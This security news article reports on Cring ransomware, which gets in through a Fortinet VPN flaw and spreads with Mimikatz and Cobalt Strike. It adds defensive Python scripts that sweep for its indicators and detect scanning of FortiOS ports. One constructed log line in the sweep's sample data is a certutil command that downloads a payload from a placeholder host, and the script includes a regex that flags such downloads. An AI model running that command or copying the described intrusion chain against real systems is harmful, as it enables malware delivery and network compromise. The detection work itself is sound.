Security experts from Kaspersky identified a new strain of ransomware exploiting unpatched vulnerabilities in Fortinet VPN devices. Dubbed Cring, the ransomware targets industrial sector entities to compromise and encrypt their network systems. Kaspersky stated that the operators behind the Cring ransomware performed a series of attacks on industries in European countries in Q1 2021. The attackers temporarily disrupted their operations by encrypting critical systems and demanding a ransom.
Cring ransomware, also known as Ghost, Crypt3r, Vjiszy1lo, Phantom, was initially discovered by Amigo_A in January 2021, and reported by the CSIRT team of Swiss telecommunications provider Swisscom.
CRING is a new strain deployed by human-operated ransomware actors. After the actors have established initial access, they drop a customized Mimikatz sample followed by #CobaltStrike. The #CRING #ransomware is then downloaded via certutil. ^mike https://t.co/v5h8eqHCPt pic.twitter.com/fkU2USEZis
— Swisscom CSIRT (@swisscom_csirt) January 26, 2021
How Cring Ransomware Spreads
The attackers exploited the CVE-2018-13379 vulnerability in the Fortinet VPN to gain access to the corporate network and extract the session file of the VPN Gateway, which contained sensitive information such as usernames and passwords in plaintext.
After gaining access to the first system, the Cring operators download the Mimikatz utility to that system, which is then used to steal the account credentials of Windows users who had logged into the affected system earlier. Leveraging the Mimikatz utility, the attackers compromise the domain administrator account to deploy ransomware payloads on other systems on the company’s network by using the Cobalt Strike framework.
“Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually, the cost is about 2 bitcoins,” reads the ransom note left by the Cring operators.
Kaspersky outlined several possibilities for how the attackers found the vulnerable device:
- The Cring operators identified the vulnerable device themselves by scanning IP addresses.
- The operators may have bought a ready-made list containing IP addresses of vulnerable Fortigate VPN Gateway devices.
- Several days before the initiation of the main attack phase, the attackers performed test connections to the VPN Gateway, apparently to check that the vulnerable version of the software was used on the device.
- In autumn 2020, an offer to buy a database of such devices appeared on a dark web forum.
Indicators of compromise (IOC)
- %temp%\execute.bat (downloader script)
- C:\__output (Cring executable)
- c5d712f82d5d37bb284acd4468ab3533 (Cring executable)
- 317098d8e21fa4e52c1162fb24ba10ae (Cring executable)
- 44d5c28b36807c69104969f5fed6f63f (downloader script)
- 227.156[.]216 (used by the threat actor during the attack)
- 227.156[.]214 (used by the threat actor during the attack)
- 12.112[.]204 (Cobalt Strike CnC)
- 67.231[.]128 (malware hosting)
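A defender receiving the list above would typically turn it into a sweep of host inventories and process logs. The following script is an added example (not Kaspersky's or Swisscom's code): it matches the article's two file paths and three MD5 hashes against a constructed file inventory, and flags certutil being used as a downloader, which is how the Swisscom CSIRT tweet quoted earlier says the Cring payload was fetched. The inventory records, process log lines and log format are constructed for this demonstration. The IP fragments are left out deliberately, since the page prints them without their first octet and a suffix match on them would produce false positives.

```python
"""IoC sweep for the Cring indicators listed in the article.

Added example; the sample inventory and process log below are constructed,
and the log format (timestamp host user commandline) is an assumption.
"""
import re
from collections import defaultdict

# MD5 hashes copied from the article's IoC list.
CRING_MD5 = {
    "c5d712f82d5d37bb284acd4468ab3533": "Cring executable",
    "317098d8e21fa4e52c1162fb24ba10ae": "Cring executable",
    "44d5c28b36807c69104969f5fed6f63f": "downloader script",
}

# File paths from the IoC list. %temp% is expanded per user at runtime, so it is
# matched as any path ending in \temp\execute.bat; C:\__output is matched exactly.
CRING_PATH_PATTERNS = [
    (re.compile(r"(^|\\)temp\\execute\.bat$"), "downloader script (%temp%\\execute.bat)"),
    (re.compile(r"^c:\\__output$"), "Cring executable (C:\\__output)"),
]

# certutil used as a downloader (the tweet names certutil as the download tool).
CERTUTIL_DOWNLOAD = re.compile(r"certutil(\.exe)?\b.*-urlcache", re.IGNORECASE)


def normalise_path(path: str) -> str:
    """Lower-case and use backslashes so the patterns above apply uniformly."""
    return path.strip().lower().replace("/", "\\")


def sweep_files(inventory):
    """inventory: iterable of (path, md5hex). Returns {path: [reasons]}."""
    hits = defaultdict(list)
    for path, md5 in inventory:
        md5 = md5.lower()
        if md5 in CRING_MD5:
            hits[path].append(f"md5 match: {CRING_MD5[md5]}")
        norm = normalise_path(path)
        for pattern, what in CRING_PATH_PATTERNS:
            if pattern.search(norm):
                hits[path].append(f"path match: {what}")
    return dict(hits)


def sweep_process_log(lines):
    """Returns the log lines in which certutil fetched a URL."""
    return [line for line in lines if CERTUTIL_DOWNLOAD.search(line)]


# Constructed sample data (not real hosts, users or telemetry).
SAMPLE_INVENTORY = [
    (r"C:\Windows\System32\notepad.exe", "0123456789abcdef0123456789abcdef"),
    (r"C:\Users\svc_backup\AppData\Local\Temp\execute.bat", "44d5c28b36807c69104969f5fed6f63f"),
    (r"C:\__output", "c5d712f82d5d37bb284acd4468ab3533"),
    (r"D:\tools\output", "317098d8e21fa4e52c1162fb24ba10ae"),  # known hash, unexpected path
]
SAMPLE_PROCESS_LOG = [
    "2021-01-20T10:01:02Z host1 svc_backup cmd.exe /c whoami",
    r"2021-01-20T10:01:09Z host1 svc_backup certutil.exe -urlcache -split -f http://example.invalid/x C:\__output",
    "2021-01-20T10:02:00Z host1 svc_backup certutil.exe -verify cert.cer",  # legitimate use
]


def run_sweep(inventory=SAMPLE_INVENTORY, process_log=SAMPLE_PROCESS_LOG):
    """Convenience wrapper returning (file_hits, process_hits)."""
    return sweep_files(inventory), sweep_process_log(process_log)


if __name__ == "__main__":
    file_hits, process_hits = run_sweep()
    for path, reasons in file_hits.items():
        print(path, "->", "; ".join(reasons))
    for line in process_hits:
        print("certutil download:", line)
```

Matching on both hash and path matters: the fourth inventory record is a known Cring hash under a path the IoC list does not mention, which a path-only sweep would miss, while a renamed or recompiled sample at `C:\__output` would be missed by a hash-only sweep.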
APT Group Targets Fortinet Products
In related news, federal agencies recently warned about Advanced Persistent Threat (APT) actors targeting unpatched vulnerabilities in Fortinet FortiOS. In a joint advisory, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors are scanning devices on ports 4443, 8443, and 10443 to exploit unpatched vulnerabilities – CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
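The scanning described in the advisory is visible from the defender's side as one external source touching several of those three ports in a short interval. The script below is an added example, not part of the advisory or the article: it parses a constructed key=value firewall log format, keeps only events on ports 4443, 8443 and 10443, and flags any source that reaches two or more distinct watched ports within a sliding ten-minute window. The log lines use RFC 5737 documentation addresses; the window length and the two-port threshold are assumptions for the example.

```python
"""Flag sources probing the FortiOS ports named in the FBI/CISA advisory.

Added example. Log format (ISO timestamp followed by key=value fields),
window and threshold are assumptions; the sample lines are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WATCHED_PORTS = {4443, 8443, 10443}   # ports from the joint advisory
WINDOW = timedelta(minutes=10)        # assumed scan window
MIN_DISTINCT_PORTS = 2                # assumed threshold: two of the three ports

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Parse '<ts> src=.. dst=.. dport=.. action=..'; return None if malformed."""
    ts_str, _, rest = line.partition(" ")
    fields = dict(FIELD_RE.findall(rest))
    try:
        return {
            "ts": datetime.strptime(ts_str, "%Y-%m-%dT%H:%M:%SZ"),
            "src": fields["src"],
            "dst": fields["dst"],
            "dport": int(fields["dport"]),
            "action": fields.get("action", ""),
        }
    except (KeyError, ValueError):
        return None


def find_scanners(lines, window=WINDOW, min_ports=MIN_DISTINCT_PORTS):
    """Return {src: sorted (dport, dst) pairs} for sources that hit at least
    `min_ports` distinct watched ports inside any `window`-long interval."""
    events = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["dport"] in WATCHED_PORTS:
            events[ev["src"]].append(ev)

    flagged = {}
    for src, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # Slide the window forward until it spans at most `window`.
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            ports = {e["dport"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                flagged[src] = sorted({(e["dport"], e["dst"]) for e in evs})
                break
    return flagged


# Constructed firewall log; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
SAMPLE_LOG = [
    "2021-04-02T08:00:01Z src=203.0.113.7 dst=198.51.100.10 dport=4443 action=deny",
    "2021-04-02T08:00:03Z src=203.0.113.7 dst=198.51.100.10 dport=8443 action=deny",
    "2021-04-02T08:00:04Z src=203.0.113.7 dst=198.51.100.11 dport=10443 action=deny",
    "2021-04-02T08:00:05Z src=203.0.113.9 dst=198.51.100.10 dport=443 action=allow",   # ordinary HTTPS
    "2021-04-02T08:05:00Z src=203.0.113.20 dst=198.51.100.10 dport=8443 action=allow", # single VPN port
    "2021-04-02T09:30:00Z src=203.0.113.20 dst=198.51.100.10 dport=10443 action=deny", # 85 min later
    "garbage line without fields",
]


if __name__ == "__main__":
    for src, probes in find_scanners(SAMPLE_LOG).items():
        print(src, "probed", probes)
```

The sliding window is what separates a scanner from a legitimate VPN user: 203.0.113.20 eventually touches two watched ports, but 85 minutes apart, so it is not flagged, while 203.0.113.7 hits all three within three seconds. Allowed and denied events are both counted, since a probe that is allowed by the firewall is the one that reaches the device.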
Reportedly, the APT actors are trying to break into multiple government, commercial, and technology services networks to launch various cyberattacks such as Distributed Denial-of-Service (DDoS) attacks, ransomware, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.
The FBI and CISA also recommended certain security measures. These include:
- Immediately patch CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
- If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization’s execution deny list. Any attempts to install or run this program and its associated files should be prevented.
- Regularly back up data, air gap, and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.
- Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).
- Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
- Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
- Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.
“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks. APT actors may use other CVEs or common exploitation techniques to gain access to critical infrastructure networks to pre-position for follow-on attacks,” the advisory added.